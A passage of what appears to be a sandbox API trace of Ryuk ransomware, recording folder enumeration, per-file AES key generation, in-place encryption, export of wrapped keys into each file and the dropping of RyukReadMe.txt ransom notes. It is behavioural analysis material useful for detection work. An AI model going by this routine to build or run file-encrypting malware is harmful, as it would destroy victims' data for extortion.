dwFreeType=0x8000) returned 1 [0151.618] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.619] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.619] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0151.619] SetLastError (dwErrCode=0x0) [0151.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0151.619] GetLastError () returned 0xb7 [0151.619] CloseHandle (hObject=0x18c) returned 1 [0151.619] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0151.619] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.619] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.619] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.619] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\jdM6SpVxO8q 1-pGb.m4a", dwFileAttributes=0x80) returned 1 [0151.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\jdM6SpVxO8q 1-pGb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\j9evgdsw4bok-e5r\\jdm6spvxo8q 1-pgb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.620] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=83888) returned 1 [0151.620] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=83888) returned 1 [0151.620] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1468e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.620] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.620] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.621] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.621] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.621] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.621] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x147b0, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x147b0, lpOverlapped=0x0) returned 1 [0151.622] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.622] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x147b0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x147c0) returned 1 [0151.622] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.622] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x147c0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x147c0, lpOverlapped=0x0) returned 1 [0151.623] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.623] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.623] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.623] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.623] CloseHandle (hObject=0x190) returned 1 [0151.638] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.642] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.642] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.642] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.642] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.642] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\PTuScQ6 NoBMR.pdf", dwFileAttributes=0x80) returned 1 [0151.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\PTuScQ6 NoBMR.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\j9evgdsw4bok-e5r\\ptuscq6 nobmr.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.643] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=75270) returned 1 [0151.643] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=75270) returned 1 [0151.643] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x124e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.643] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.643] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.643] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.643] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.644] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.644] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x12606, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x12606, lpOverlapped=0x0) returned 1 [0151.645] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.645] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12606, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x12610) returned 1 [0151.645] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.645] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x12610, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x12610, lpOverlapped=0x0) returned 1 [0151.645] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.646] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.646] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.646] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.646] CloseHandle (hObject=0x190) returned 1 [0151.790] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.796] CryptDestroyKey (hKey=0x3b8690) returned 1 [0151.796] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0151.796] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0151.796] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0151.796] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\rei72 5ovHl6.pps", dwFileAttributes=0x80) returned 1 [0151.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\rei72 5ovHl6.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\j9evgdsw4bok-e5r\\rei72 5ovhl6.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0151.797] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=22541) returned 1 [0151.797] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=22541) returned 1 [0151.797] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x56eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.797] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0151.798] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.798] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0151.798] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0151.798] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.798] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x580d, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x580d, lpOverlapped=0x0) returned 1 [0151.799] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0151.799] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x580d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x5810) returned 1 [0151.799] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0151.799] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x5810, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x5810, lpOverlapped=0x0) returned 1 [0151.799] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0151.799] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.800] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0151.800] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0151.800] CloseHandle (hObject=0x190) returned 1 [0151.815] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.133] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.133] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.133] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0152.133] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0152.133] SetLastError (dwErrCode=0x0) [0152.133] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\J9EvGdsW4BOk-e5R\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\j9evgdsw4bok-e5r\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.134] GetLastError () returned 0x0 [0152.134] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0152.135] CloseHandle (hObject=0x18c) returned 1 [0152.135] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.135] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.135] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\T7rrs0HY2V7.png", dwFileAttributes=0x80) returned 1 [0152.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\T7rrs0HY2V7.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\t7rrs0hy2v7.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.135] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=29476) returned 1 [0152.135] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=29476) returned 1 [0152.136] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x7202, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.136] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0152.136] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.136] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0152.136] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.137] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.137] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x7324, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x7324, lpOverlapped=0x0) returned 1 [0152.137] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0152.137] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x7324, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x7330) returned 1 [0152.138] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.138] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x7330, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x7330, lpOverlapped=0x0) returned 1 [0152.138] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0152.138] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.138] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.138] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0152.138] CloseHandle (hObject=0x18c) returned 1 [0152.159] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.166] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.166] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.166] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.166] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.166] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\yYnf1i-mr4KTMjL2D.flv", dwFileAttributes=0x80) returned 1 [0152.167] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\yYnf1i-mr4KTMjL2D.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\yynf1i-mr4ktmjl2d.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.167] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=61295) returned 1 [0152.167] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=61295) returned 1 [0152.167] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0xee4d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.167] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0152.168] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.168] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0152.168] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0152.168] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.168] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xef6f, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xef6f, lpOverlapped=0x0) returned 1 [0152.169] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0152.169] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xef6f, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xef70) returned 1 [0152.170] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.170] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xef70, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xef70, lpOverlapped=0x0) returned 1 [0152.170] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0152.171] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.171] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0152.171] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0152.171] CloseHandle (hObject=0x18c) returned 1 [0152.222] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.228] CryptDestroyKey (hKey=0x3b8690) returned 1 [0152.228] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0152.229] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0152.229] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0152.229] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\zNQLX8VQbJ9U.png", dwFileAttributes=0x80) returned 1 [0152.229] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\j1wLLR\\zNQLX8VQbJ9U.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\j1wllr\\znqlx8vqbj9u.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0152.229] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=75725) returned 1 [0152.229] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=75725) returned 1 [0152.230] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x126ab, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.230] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, 